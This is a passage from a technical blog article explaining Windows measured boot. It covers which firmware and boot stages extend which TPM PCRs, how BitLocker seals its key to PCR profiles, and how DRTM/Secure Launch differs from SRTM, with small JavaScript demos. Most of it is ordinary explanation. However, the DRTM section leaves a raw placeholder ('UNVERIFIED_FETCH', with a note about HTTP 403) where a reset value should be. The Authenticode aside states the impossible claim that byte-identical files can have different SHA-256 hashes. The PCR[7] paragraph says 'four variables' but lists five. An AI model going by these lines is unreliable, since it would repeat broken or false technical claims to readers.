&lt;h3&gt;6.2 PEI/DXE, option ROMs, and PCR[1-3]&lt;/h3&gt;
&lt;p&gt;After the CRTM hands off, the Pre-EFI Initialisation (PEI) phase runs and the Driver Execution Environment (DXE) phase loads UEFI drivers. PEI does early silicon initialisation -- memory controller, cache topology, basic chipset config -- and DXE does device discovery, including option ROMs for plug-in cards.&lt;/p&gt;
&lt;p&gt;Each option ROM that runs is measured into PCR[2]. The option ROM&apos;s configuration -- card-specific NVRAM state that survives reboot -- is measured into PCR[3]. The PFP also reserves PCR[1] for the platform configuration: CMOS settings, the SMBIOS table contents, and any BIOS-setup-visible knob that affects platform behaviour per the PCR-allocation mapping surfaced in Microsoft&apos;s &lt;code&gt;Tbsi_Get_TCG_Log&lt;/code&gt; documentation [@ms-tbs-get-tcg-log]. Changing your boot order in BIOS setup changes PCR[1]. Disabling a USB controller in firmware changes PCR[1]. Installing a discrete GPU adds an &lt;code&gt;EV_EFI_BOOT_SERVICES_DRIVER&lt;/code&gt; event into PCR[2] for the GPU&apos;s video BIOS.&lt;/p&gt;
&lt;h3&gt;6.3 Secure Boot variables and PCR[7]&lt;/h3&gt;
&lt;p&gt;PCR[7] is the Secure Boot policy PCR. It records the digests of the four variables that define &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot identity&lt;/a&gt; -- &lt;code&gt;SecureBoot&lt;/code&gt; (the on/off flag), &lt;code&gt;PK&lt;/code&gt; (Platform Key), &lt;code&gt;KEK&lt;/code&gt; (Key Exchange Key), &lt;code&gt;db&lt;/code&gt; (allowed signers), and &lt;code&gt;dbx&lt;/code&gt; (revocation list) -- plus any signed program execution events the firmware logs to PCR[7] under &lt;code&gt;EV_EFI_VARIABLE_AUTHORITY&lt;/code&gt; [@gh-wack0-bitlocker].&lt;/p&gt;
&lt;p&gt;Each variable contributes one &lt;code&gt;EV_EFI_VARIABLE_DRIVER_CONFIG&lt;/code&gt; event whose Event field encodes &lt;code&gt;(VariableName GUID, UnicodeName, VariableDataLength, VariableData)&lt;/code&gt; and whose digest is the SHA-256 of that entire structure. &lt;em&gt;The digest is not over the variable data alone&lt;/em&gt;; it is over the GUID and name as well. This matters: when the May 2023 Microsoft &lt;code&gt;dbx&lt;/code&gt; update shipped under KB5025885 [@ms-kb5025885] added the BlackLotus-vulnerable boot manager hashes to the revocation list, the variable data length grew, the structure changed, and the resulting &lt;code&gt;EV_EFI_VARIABLE_DRIVER_CONFIG&lt;/code&gt; digest differed. Every UEFI Windows machine on Earth that consumed that &lt;code&gt;dbx&lt;/code&gt; update saw PCR[7] move.&lt;/p&gt;
&lt;p&gt;From the Wack0/bitlocker-attacks index [@gh-wack0-bitlocker], reproducing TCG EFI Platform Specification §6.4 verbatim: &lt;em&gt;&quot;If the platform provides a firmware debugger mode which may be used prior to the UEFI environment or if the platform provides a debugger for the UEFI environment, then the platform SHALL extend an EV_EFI_ACTION event into PCR[7] before allowing use of the debugger&quot;&lt;/em&gt;. The intent is clear: a debugged firmware is a different PCR[7] than a production firmware. The verifier can refuse to release a key to a debugged platform.&lt;/p&gt;
&lt;h3&gt;6.4 Boot manager (bootmgfw.efi) and PCR[4] + PCR[11]&lt;/h3&gt;
&lt;p&gt;The UEFI Boot Device Selection (BDS) phase locates &lt;code&gt;EFI/Microsoft/Boot/bootmgfw.efi&lt;/code&gt; on the EFI System Partition, computes its &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;Authenticode digest&lt;/a&gt;, verifies the Authenticode signature against &lt;code&gt;db&lt;/code&gt; and &lt;code&gt;dbx&lt;/code&gt;, logs &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/api/tbs/nf-tbs-tbsi_get_tcg_log&quot; rel=&quot;noopener&quot;&gt;an &lt;code&gt;EV_EFI_BOOT_SERVICES_APPLICATION&lt;/code&gt; event into PCR[4]&lt;/a&gt; with that digest, and transfers control. PCR[4] now binds to the boot manager&apos;s image content. A different boot manager binary -- a different version, a different language pack -- produces a different PCR[4].&lt;/p&gt;

Microsoft&apos;s Portable Executable signature format. The Authenticode digest is computed over the PE image *excluding* fields the loader rewrites (file offset bytes, the checksum field, the digital-signature pointer). Authenticode is not the same as a SHA-256 over the file -- two byte-identical .exe files can have different SHA-256 but the same Authenticode digest, and vice versa. Boot Guard, Secure Boot, and PCR[4] all hash the Authenticode digest, not the raw file.
&lt;p&gt;Once &lt;code&gt;bootmgfw.efi&lt;/code&gt; runs, it extends its own events into PCR[11]. These are Microsoft-specific Windows Boot Configuration Log (WBCL) records, not generic TCG events. They include the BCD store contents, the boot-environment configuration, and Microsoft-private telemetry about the boot manager&apos;s policy decisions. PCR[11] is the &lt;em&gt;BitLocker control PCR&lt;/em&gt; -- the index that captures Windows-side boot-time configuration.&lt;/p&gt;

The Microsoft-specific extension of the TCG event log carrying boot-manager, loader, and ELAM events. WBCL events use the TCG `EV_EVENT_TAG` event type with Microsoft-private sub-types. They are extended into PCR[11], PCR[12], and PCR[13]. WBCL is exposed by `Tbsi_Get_TCG_Log_Ex` and is what `tpmtool.exe getdeviceinformation` actually parses.
&lt;h3&gt;6.5 winload.efi and the ELAM handoff&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;bootmgfw.efi&lt;/code&gt; chains to &lt;code&gt;winload.efi&lt;/code&gt;, the OS loader. &lt;code&gt;winload&lt;/code&gt; measures the Windows kernel image (&lt;code&gt;ntoskrnl.exe&lt;/code&gt;), the Hardware Abstraction Layer (&lt;code&gt;hal.dll&lt;/code&gt;), the OS configuration data (the boot manager&apos;s view of boot-critical drivers), and each boot-critical driver in load order -- each into PCR[11] as a WBCL record. The kernel binary itself is part of that chain; a kernel update changes PCR[11].&lt;/p&gt;
&lt;p&gt;The Early Launch Anti-Malware (ELAM) interface gives a vendor anti-malware driver a chance to run before all other drivers and approve or block subsequent driver load attempts. &lt;code&gt;winload&lt;/code&gt; measures the ELAM policy file hash into PCR[13]; the ELAM driver, when loaded, extends its own image digest into PCR[13]; the ELAM driver then returns its allow/deny verdict on each subsequent driver, and &lt;code&gt;winload&lt;/code&gt; logs those verdicts (also into PCR[13] under WBCL &lt;code&gt;EV_EVENT_TAG&lt;/code&gt;).&lt;/p&gt;
&lt;h3&gt;6.6 Kernel and the final separator&lt;/h3&gt;
&lt;p&gt;Once the Windows kernel starts, it exposes the TCG event log through the TPM Base Services driver &lt;code&gt;Tbs.sys&lt;/code&gt;, which is consumed by Win32 callers through &lt;code&gt;Tbsi_Get_TCG_Log&lt;/code&gt;. The kernel emits a &lt;code&gt;EV_SEPARATOR&lt;/code&gt; event into every measured PCR -- the &quot;ready-to-boot&quot; marker. After the separator, no further measured-boot events occur for the current boot session. The WBCL is frozen. A verifier reading the log at this point sees the complete boot history.&lt;/p&gt;
&lt;h3&gt;6.7 Reading the log from user mode&lt;/h3&gt;
&lt;p&gt;On a Windows 11 24H2 machine, the simplest way to read the log is &lt;code&gt;tpmtool.exe getdeviceinformation&lt;/code&gt; from an elevated prompt -- it prints the parsed WBCL plus the current PCR values. For the raw binary log, &lt;code&gt;Get-TpmEndorsementKeyInfo&lt;/code&gt; from PowerShell returns the EK chain, and &lt;code&gt;MeasuredBootTool.exe -log &amp;lt;path&amp;gt;&lt;/code&gt; from the Windows HLK kit returns the raw binary log file written under &lt;code&gt;C:\Windows\Logs\MeasuredBoot\*.log&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Cross-platform, &lt;code&gt;tpm2_eventlog&lt;/code&gt; [@gh-tpm2-eventlog-man] from the tpm2-tools suite [@gh-tpm2-tools] parses any binary log conforming to the PC Client PFP -- including Windows-saved logs, because the WBCL extension is structurally compatible. The man page is precise: &lt;em&gt;&quot;tpm2_eventlog(1) -- Parse a binary TPM2 event log... The format of this log documented in the &apos;TCG PC Client Platform Firmware Profile Specification&apos;.&quot;&lt;/em&gt; On Linux, the firmware-published log lives at &lt;code&gt;/sys/kernel/security/tpm0/binary_bios_measurements&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;{`
// Simulate three iterative SHA-256 extends into a single PCR.
// Initial PCR is 32 zero bytes. Each extend: PCR := SHA256(PCR || measurement).&lt;/p&gt;
&lt;p&gt;async function sha256(buffer) {
  const hash = await crypto.subtle.digest(&apos;SHA-256&apos;, buffer);
  return new Uint8Array(hash);
}&lt;/p&gt;
&lt;p&gt;function concat(a, b) {
  const out = new Uint8Array(a.length + b.length);
  out.set(a, 0);
  out.set(b, a.length);
  return out;
}&lt;/p&gt;
&lt;p&gt;function toHex(arr) {
  return Array.from(arr).map(b =&amp;gt; b.toString(16).padStart(2, &apos;0&apos;)).join(&apos;&apos;);
}&lt;/p&gt;
&lt;p&gt;async function extendChain(measurements) {
  let pcr = new Uint8Array(32); // 32 zero bytes
  for (const m of measurements) {
    pcr = await sha256(concat(pcr, m));
  }
  return toHex(pcr);
}&lt;/p&gt;
&lt;p&gt;const a = new TextEncoder().encode(&apos;firmware-v1.16&apos;);
const b = new TextEncoder().encode(&apos;bootmgfw-2024-03&apos;);
const c = new TextEncoder().encode(&apos;winload-26100.123&apos;);&lt;/p&gt;
&lt;p&gt;(async () =&amp;gt; {
  const abc = await extendChain([a, b, c]);
  const cba = await extendChain([c, b, a]);
  console.log(&apos;PCR after a,b,c =&apos;, abc);
  console.log(&apos;PCR after c,b,a =&apos;, cba);
  console.log(&apos;Same value?&apos;, abc === cba);
})();
`}&lt;/p&gt;
&lt;p&gt;Run that snippet and you will see two completely different 32-byte hex strings. The PCR encodes &lt;em&gt;the order&lt;/em&gt;. A verifier comparing your machine&apos;s PCR[11] against a known-good baseline is implicitly checking that the kernel, the HAL, and the boot-critical drivers all loaded in the expected sequence -- not just that they all loaded. Reorder the chain, even with identical inputs, and the PCR moves. This is the property that makes the chain-of-hashes axiom load-bearing.&lt;/p&gt;
&lt;h3&gt;6.8 The PCR allocation cheat sheet&lt;/h3&gt;
&lt;p&gt;Pin the table from Section 4 to your wall. Most operational questions reduce to &quot;which PCR is affected by this change, and is it in my BitLocker profile?&quot; Three quick rules:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Code changes go to even PCRs (0, 2, 4).&lt;/strong&gt; Firmware blob, option ROM, boot manager. A firmware update moves PCR[0]; a discrete GPU swap moves PCR[2]; a boot-manager update moves PCR[4].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configuration changes go to odd PCRs (1, 3, 5).&lt;/strong&gt; BIOS setup, option ROM config, EFI variables seen by the boot manager.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Policy and identity go to PCR[7].&lt;/strong&gt; Secure Boot keys. Any &lt;code&gt;dbx&lt;/code&gt; update moves PCR[7]. Disabling Secure Boot moves PCR[7]. Enrolling third-party &lt;code&gt;db&lt;/code&gt; entries moves PCR[7].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;PCR[11] is the OS-loader code chain on Windows (kernel, HAL, boot drivers). PCR[13] is the ELAM policy and driver. PCR[14] is, by Microsoft convention, boot-loader-authority events; by Linux shim convention, MOK enrolment. Same index; different ontology. Verifiers must pick a side.&lt;/p&gt;
&lt;h3&gt;6.9 BitLocker seal-binding&lt;/h3&gt;
&lt;p&gt;BitLocker&apos;s Volume Master Key is wrapped by a TPM-resident sealed blob whose policy is &lt;code&gt;TPM2_PolicyPCR&lt;/code&gt; over a chosen &lt;em&gt;PCR profile&lt;/em&gt;. The default UEFI profile is the bitmask &lt;code&gt;0x00000080 | 0x00000800 = 0x880&lt;/code&gt; -- that is PCR[7] (bit 7 = &lt;code&gt;0x80&lt;/code&gt;) plus PCR[11] (bit 11 = &lt;code&gt;0x800&lt;/code&gt;) -- as documented in the BitLocker Group Policy reference [@ms-learn-bitlocker-gpo], which notes verbatim that &lt;em&gt;&quot;when Secure Boot State (PCR7) support is available, the default platform validation profile secures the encryption key using Secure Boot State (PCR 7) and the BitLocker access control (PCR 11).&quot;&lt;/em&gt; The legacy CSM/BIOS profile is &lt;code&gt;0x00000015 | 0x00000800 = 0x815&lt;/code&gt; -- that is PCR[0], PCR[2], PCR[4], plus PCR[11].&lt;/p&gt;
&lt;p&gt;At seal time (when BitLocker enables, or when a user changes the protector configuration), the TPM records the current PCR values into the policy. At every subsequent boot, the boot manager rebuilds the session, calls &lt;code&gt;TPM2_PolicyPCR&lt;/code&gt; with the &lt;em&gt;current&lt;/em&gt; PCR values, and calls &lt;code&gt;TPM2_Unseal&lt;/code&gt;. If the current PCRs match the seal-time digest, the TPM releases the VMK and BitLocker unlocks transparently. If they don&apos;t match, the TPM refuses and Windows prompts for the 48-digit recovery key.&lt;/p&gt;
&lt;p&gt;From Microsoft&apos;s BitLocker countermeasures documentation [@ms-learn-bitlocker-counter]: &lt;em&gt;&quot;By default, BitLocker provides integrity protection for Secure Boot by using the TPM PCR[7] measurement. An unauthorized EFI firmware, EFI boot application, or bootloader can&apos;t run and acquire the BitLocker key&quot;&lt;/em&gt;. The PCR[7]-default choice is deliberate: PCR[7] is the &lt;em&gt;policy&lt;/em&gt; PCR, not the &lt;em&gt;code&lt;/em&gt; PCR. Firmware updates don&apos;t change a Secure-Boot-policy hash; only key-database updates do.&lt;/p&gt;

sequenceDiagram
    participant Firmware
    participant BootMgr as bootmgfw.efi
    participant TPM
    participant Winload as winload.efi
    Firmware-&amp;gt;&amp;gt;TPM: TPM2_PCR_Extend (PCR[0-7])
    BootMgr-&amp;gt;&amp;gt;TPM: TPM2_PCR_Extend (PCR[4], PCR[11], PCR[12])
    BootMgr-&amp;gt;&amp;gt;TPM: TPM2_StartAuthSession
    BootMgr-&amp;gt;&amp;gt;TPM: TPM2_PolicyPCR (selection = current profile)
    BootMgr-&amp;gt;&amp;gt;TPM: TPM2_Unseal (sealed VMK blob)
    alt PCRs match seal-time digest
        TPM--&amp;gt;&amp;gt;BootMgr: VMK plaintext
        BootMgr-&amp;gt;&amp;gt;Winload: hand off, VMK in protected memory
        Winload--&amp;gt;&amp;gt;Firmware: continue boot
    else PCRs do not match
        TPM--&amp;gt;&amp;gt;BootMgr: TPM_RC_POLICY_FAIL
        BootMgr--&amp;gt;&amp;gt;BootMgr: prompt for 48-digit recovery key
    end
&lt;p&gt;The on-disk registry path that records the profile choice is &lt;code&gt;HKLM\SOFTWARE\Policies\Microsoft\FVE\PlatformValidationProfileUEFI&lt;/code&gt; [@ms-learn-bitlocker-gpo]. The value is a 24-bit bitmask where bit &lt;code&gt;N&lt;/code&gt; selects PCR[N]. A device that sealed under the default &lt;code&gt;0x880&lt;/code&gt; profile and then has Group Policy changed to &lt;code&gt;0x815&lt;/code&gt; will &lt;em&gt;not&lt;/em&gt; automatically re-seal -- you must explicitly disable and re-enable the TPM protector with &lt;code&gt;manage-bde -protectors&lt;/code&gt; [@ms-manage-bde-protectors] to rotate the policy.&lt;/p&gt;
&lt;p&gt;A small utility decodes the bitmask:&lt;/p&gt;
&lt;p&gt;{`
function decodeProfile(mask) {
  const selected = [];
  for (let bit = 0; bit &amp;lt; 24; bit++) {
    if (mask &amp;amp; (1 &amp;lt;&amp;lt; bit)) selected.push(bit);
  }
  return selected;
}&lt;/p&gt;
&lt;p&gt;console.log(&apos;Default UEFI profile (0x880):&apos;, decodeProfile(0x880));
console.log(&apos;Legacy CSM profile (0x815):  &apos;, decodeProfile(0x815));
console.log(&apos;A more restrictive profile (0x8D5):&apos;, decodeProfile(0x8D5));&lt;/p&gt;
&lt;p&gt;// Output:
// Default UEFI profile (0x880): [7, 11]            (PCR[7]+PCR[11])
// Legacy CSM profile (0x815):   [0, 2, 4, 11]      (PCR[0]+PCR[2]+PCR[4]+PCR[11])
// A more restrictive profile (0x8D5): [0, 2, 4, 6, 7, 11]
`}&lt;/p&gt;
&lt;p&gt;Run it. Your machine&apos;s profile mask is one of those three (or close enough). If the mask includes PCR[0], every firmware update will trigger a recovery prompt. If it omits PCR[0] but includes PCR[7], only Secure Boot key changes (Microsoft&apos;s annual &lt;code&gt;dbx&lt;/code&gt; updates, third-party Linux enrolments, BIOS-setup Secure Boot toggles) will. The four canonical recovery-prompt causes follow directly:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cause&lt;/th&gt;
&lt;th&gt;PCR affected&lt;/th&gt;
&lt;th&gt;Mitigation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;UEFI firmware update&lt;/td&gt;
&lt;td&gt;PCR[0]&lt;/td&gt;
&lt;td&gt;Suspend BitLocker before update; legacy profile only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft &lt;code&gt;dbx&lt;/code&gt; update or Secure Boot key rotation&lt;/td&gt;
&lt;td&gt;PCR[7]&lt;/td&gt;
&lt;td&gt;Suspend BitLocker before patch Tuesday&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Boot-manager binary swap (KB-driven update)&lt;/td&gt;
&lt;td&gt;PCR[4], PCR[11]&lt;/td&gt;
&lt;td&gt;Suspend BitLocker before cumulative update&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Firmware setup change (virtualization toggle, device enable/disable)&lt;/td&gt;
&lt;td&gt;PCR[1]&lt;/td&gt;
&lt;td&gt;Suspend BitLocker before deliberate change&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    CRTM[&quot;CRTM&lt;br /&gt;(Boot Guard ACM / PSP / Pluton)&quot;] --&amp;gt;|&quot;PCR[0] EV_S_CRTM_VERSION&quot;| PEI
    PEI[&quot;PEI&lt;br /&gt;(silicon init)&quot;] --&amp;gt;|&quot;PCR[0] EV_S_CRTM_CONTENTS&quot;| DXE
    DXE[&quot;DXE&lt;br /&gt;(driver execution)&quot;] --&amp;gt;|&quot;PCR[2] option ROM&lt;br /&gt;PCR[3] option ROM config&quot;| OPTROM
    OPTROM[&quot;option ROMs&quot;] --&amp;gt;|&quot;PCR[7] SecureBoot/PK/KEK/db/dbx&quot;| BDS
    BDS[&quot;BDS&lt;br /&gt;(boot device selection)&quot;] --&amp;gt;|&quot;PCR[4] Authenticode digest&quot;| BM
    BM[&quot;bootmgfw.efi&quot;] --&amp;gt;|&quot;PCR[11] WBCL boot mgr&lt;br /&gt;PCR[12] boot config&quot;| WL
    WL[&quot;winload.efi&quot;] --&amp;gt;|&quot;PCR[11] kernel/HAL/drivers&lt;br /&gt;PCR[13] ELAM policy&quot;| ELAM
    ELAM[&quot;ELAM driver&quot;] --&amp;gt;|&quot;PCR[13] driver hash&quot;| KERN
    KERN[&quot;Windows kernel&quot;] --&amp;gt;|&quot;EV_SEPARATOR on every measured PCR (freeze)&quot;| DONE[&quot;WBCL frozen&quot;]
&lt;p&gt;We have walked the chain. What about the chain we cannot trust -- the OEM-vendor-firmware-allowlist explosion that overwhelms remote verifiers?&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches: DRTM, Late Launch, and Secure Launch&lt;/h2&gt;
&lt;p&gt;A quote from Microsoft&apos;s hardware-root-of-trust documentation [@ms-learn-hwrot] frames the problem precisely: &lt;em&gt;&quot;As there are thousands of PC vendors that produce many models with different UEFI BIOS versions, there becomes an incredibly large number of SRTM measurements upon bootup. Two techniques exist to establish trust here -- either maintain a list of known &apos;bad&apos; SRTM measurements (also known as a blocklist), or a list of known &apos;good&apos; SRTM measurements (also known as an allowlist).&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The allowlist explodes. Every OEM, every model, every firmware revision, every Secure Boot key generation produces a fresh PCR[0]/PCR[7]/PCR[11] tuple. A central verifier that wants to assert &quot;this fleet booted firmware Microsoft has signed off on&quot; has to maintain a database whose cardinality grows quadratically in (vendors x firmware versions). By 2017 the table size made the verifier policy ungovernable for general-purpose Windows fleets.&lt;/p&gt;
&lt;p&gt;The fix is structural: introduce a &lt;em&gt;second&lt;/em&gt; measurement plane that does not depend on the OEM. From the same Microsoft document: &lt;em&gt;&quot;System Guard Secure Launch, first introduced in Windows 10 version 1809, aims to alleviate these issues by using a technology known as the Dynamic Root of Trust for Measurement (DRTM).&quot;&lt;/em&gt; And: &lt;em&gt;&quot;Secure Launch simplifies management of SRTM measurements because the launch code is now unrelated to a specific hardware configuration.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;DRTM is a CPU primitive. On Intel, it is &lt;a href=&quot;https://www.felixcloutier.com/x86/senter&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;GETSEC[SENTER]&lt;/code&gt;&lt;/a&gt;, introduced with Trusted Execution Technology in 2007. From the Intel SDM mirror, verbatim: &lt;em&gt;&quot;GETSEC[SENTER] / Launch a measured environment. EBX holds the SINIT authenticated code module physical base address. ECX holds the SINIT authenticated code module size (bytes).&quot;&lt;/em&gt; On AMD, the equivalent is the &lt;code&gt;SKINIT&lt;/code&gt; instruction from the AMD-V (SVM) family, introduced with the first AMD-V silicon in 2005-2006 [@wiki-x86-virt]. Microsoft&apos;s Secure Launch implementation [@ms-learn-sgsl] issues &lt;code&gt;SENTER&lt;/code&gt; or &lt;code&gt;SKINIT&lt;/code&gt; from a small Secure Kernel Loader (SKL) inside &lt;code&gt;winload.efi&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What &lt;code&gt;SENTER&lt;/code&gt; and &lt;code&gt;SKINIT&lt;/code&gt; do, at machine level, is roughly identical: they suspend all but one CPU, reset PCRs 17 through 22 in the TPM to a defined value (zero for SHA-256, all-ones for SHA-1 historically; the SHA-256 reset value is &lt;code&gt;UNVERIFIED_FETCH&lt;/code&gt; -- the TCG PFP returns HTTP 403 to non-browser agents), load the launch module (Intel verifies the signature on its SINIT Authenticated Code Module; AMD measures its Secure Loader Block rather than checking a signature), and atomically transfer control to it with interrupts disabled and the IOMMU active. The ACM/SLB&apos;s measurement gets extended into PCR[17]; the Measured Launch Environment (MLE) it loads -- on Windows, the &lt;a href=&quot;https://paragmali.com/blog/above-ring-zero-how-the-windows-hypervisor-became-a-security/&quot; rel=&quot;noopener&quot;&gt;Hyper-V hypervisor&lt;/a&gt; and the &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;secure kernel&lt;/a&gt; -- gets extended into PCR[18].&lt;/p&gt;

The code body that the DRTM primitive ($SENTER$/$SKINIT$) measures into PCR[18] after the Authenticated Code Module (Intel) or Secure Loader Block (AMD) has been measured into PCR[17] and verified. On Microsoft Secure Launch, the MLE is the hypervisor plus the secure kernel. On Linux+TrenchBoot, the MLE is the GRUB late-launch component plus the kernel.
&lt;p&gt;The reason &lt;code&gt;SENTER&lt;/code&gt; and &lt;code&gt;SKINIT&lt;/code&gt; matter, beyond the resetting of PCRs 17-22, is &lt;em&gt;what they don&apos;t measure&lt;/em&gt;. They do not measure the PEI/DXE firmware. They do not measure option ROMs. They do not measure the entire SRTM trail in PCRs 0-7. A verifier that consumes only PCRs 17-22 sees a uniform digest across every Intel platform (because every Intel platform runs the same Intel-signed ACM) and every Microsoft Secure-Launch-capable system (because every such system runs the same Microsoft-signed SKL). The OEM diversity is absorbed by ignoring the diverse measurements.&lt;/p&gt;
&lt;h3&gt;The Rutkowska / Wojtczuk SMM attack and the DRTM preconditions&lt;/h3&gt;
&lt;p&gt;Before &lt;code&gt;SENTER&lt;/code&gt; could be trusted, it had to survive a DMA attack class that Joanna Rutkowska and Rafal Wojtczuk demonstrated at Black Hat DC 2009 [@itl-attacking-txt-2009]. Their paper&apos;s abstract is direct: &lt;em&gt;&quot;We describe a practical attack that is capable of bypassing the TXT&apos;s trusted boot process&quot;&lt;/em&gt;. The mechanism: between the signature check on the SINIT ACM and its execution, a DMA-capable peripheral could overwrite the verified payload. Intel&apos;s response was architectural -- route SINIT through IOMMU-protected memory, and refuse to start &lt;code&gt;SENTER&lt;/code&gt; if the IOMMU is not on. The fix is enforced at the instruction level: &lt;a href=&quot;https://www.felixcloutier.com/x86/senter&quot; rel=&quot;noopener&quot;&gt;the SDM mirror&apos;s &lt;code&gt;GETSEC[SENTER]&lt;/code&gt; description&lt;/a&gt; lists the chipset and TPM preconditions GETSEC[SENTER] now checks before opening the measured-launch window. Every modern DRTM design rests on the assumption that the IOMMU is active at the late-launch instant.&lt;/p&gt;

DRTM does not replace SRTM; it layers on top. SRTM still measures everything pre-late-launch into PCRs 0-7 and 11-14. DRTM resets a separate slice (PCRs 17-22) and starts fresh. A verifier that wants the small OEM-invariant TCB consumes the DRTM slice and ignores PCRs 0-16. A verifier that wants the full pre-late-launch history consumes the SRTM slice and ignores 17-22. A verifier that wants both -- say, &quot;the firmware was on the allowlist *and* the secure kernel started cleanly&quot; -- consumes both. The cost is one extra `TPM2_Quote` selection mask. The benefit is that you can change attestation policy without changing the measurement plane.
&lt;h3&gt;Microsoft Secure Launch and the Secured-Core PC bar&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s Secured-core PC programme [@ms-learn-secured-core] packages Secure Launch with a set of other hardware requirements: SMM Supervisor, kernel DMA protection, Boot Guard or PSP firmware, Pluton or equivalent silicon root of trust, and Memory Integrity (HVCI) enabled by default. The Microsoft framing: &lt;em&gt;&quot;Microsoft is working closely with OEM partners and silicon vendors to build Secured-core PCs that features deeply integrated hardware, firmware and software to ensure enhanced security for devices, identities and data.&quot;&lt;/em&gt; The result is a tier-1 SKU set whose attestation evidence is the small OEM-invariant DRTM TCB, not the large SRTM history.&lt;/p&gt;
&lt;p&gt;Operationally, the Secured-Core flag enables the configuration block at &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios&lt;/code&gt; per Microsoft&apos;s Secure Launch configuration guide [@ms-learn-sgsl]. When the registry flag is set and the silicon supports late launch, &lt;code&gt;winload.efi&lt;/code&gt; issues &lt;code&gt;SENTER&lt;/code&gt;/&lt;code&gt;SKINIT&lt;/code&gt; after measuring the early kernel, and the hypervisor launches inside the MLE.&lt;/p&gt;
&lt;h3&gt;TrenchBoot: open-source DRTM for Linux&lt;/h3&gt;
&lt;p&gt;DRTM is not Windows-only. The TrenchBoot project [@trenchboot-org] -- with contributors from Apertus Solutions, Oracle, and 3mdeb [@trenchboot-org] -- maintains an open-source DRTM stack for Linux and Xen on GRUB. From the TrenchBoot documentation repo [@gh-trenchboot-docs]: &lt;em&gt;&quot;TrenchBoot is a framework that allows individuals and projects to build security engines to perform launch integrity actions for their systems.&quot;&lt;/em&gt; The Linux side of the same primitive that Microsoft Secure Launch uses on Windows.&lt;/p&gt;

flowchart TD
    subgraph SRTM[&quot;SRTM chain (PCRs 0-7, 11-14)&quot;]
        S1[&quot;CRTM&quot;] --&amp;gt; S2[&quot;PEI/DXE&quot;] --&amp;gt; S3[&quot;option ROMs&quot;] --&amp;gt; S4[&quot;BDS&quot;]
        S4 --&amp;gt; S5[&quot;bootmgfw.efi&quot;] --&amp;gt; S6[&quot;winload.efi (early)&quot;]
    end
    subgraph DRTM[&quot;DRTM chain (PCRs 17-22)&quot;]
        D1[&quot;SKL issues SENTER / SKINIT&quot;] --&amp;gt; D2[&quot;CPU resets PCRs 17-22&quot;]
        D2 --&amp;gt; D3[&quot;ACM/SLB extended into PCR[17]&quot;]
        D3 --&amp;gt; D4[&quot;MLE (hypervisor + secure kernel) into PCR[18]&quot;]
        D4 --&amp;gt; D5[&quot;Secure kernel boots; IOMMU active&quot;]
    end
    S6 --&amp;gt; D1
&lt;p&gt;The comparison below synthesizes the TCG PFP PCR allocation surfaced in Microsoft&apos;s &lt;code&gt;Tbsi_Get_TCG_Log&lt;/code&gt; reference [@ms-tbs-get-tcg-log] with the Microsoft hardware-root-of-trust documentation [@ms-learn-hwrot] and the BitLocker countermeasures unlock-mode enumeration [@ms-learn-bitlocker-counter]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;SRTM (PCR[0-7,11-14])&lt;/th&gt;
&lt;th&gt;DRTM (PCR[17-22])&lt;/th&gt;
&lt;th&gt;TPM-only BitLocker (seal PCR[7,11])&lt;/th&gt;
&lt;th&gt;TPM+PIN&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Trust-anchor size&lt;/td&gt;
&lt;td&gt;OEM CRTM + firmware + option ROMs + drivers (large)&lt;/td&gt;
&lt;td&gt;Vendor ACM/SLB + MLE only (small)&lt;/td&gt;
&lt;td&gt;Same as SRTM&lt;/td&gt;
&lt;td&gt;Same + human PIN secret&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hardware required&lt;/td&gt;
&lt;td&gt;Any TPM 2.0 platform&lt;/td&gt;
&lt;td&gt;Intel TXT-capable or AMD SVM-capable + IOMMU&lt;/td&gt;
&lt;td&gt;Same as SRTM&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Recovery prompts/year&lt;/td&gt;
&lt;td&gt;High (firmware + dbx + boot manager)&lt;/td&gt;
&lt;td&gt;Low (PCR[17-22] not in default profile)&lt;/td&gt;
&lt;td&gt;High on TPM-only profile&lt;/td&gt;
&lt;td&gt;Same as seal profile&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;bitpixie-class attack&lt;/td&gt;
&lt;td&gt;Vulnerable&lt;/td&gt;
&lt;td&gt;Not directly mitigated&lt;/td&gt;
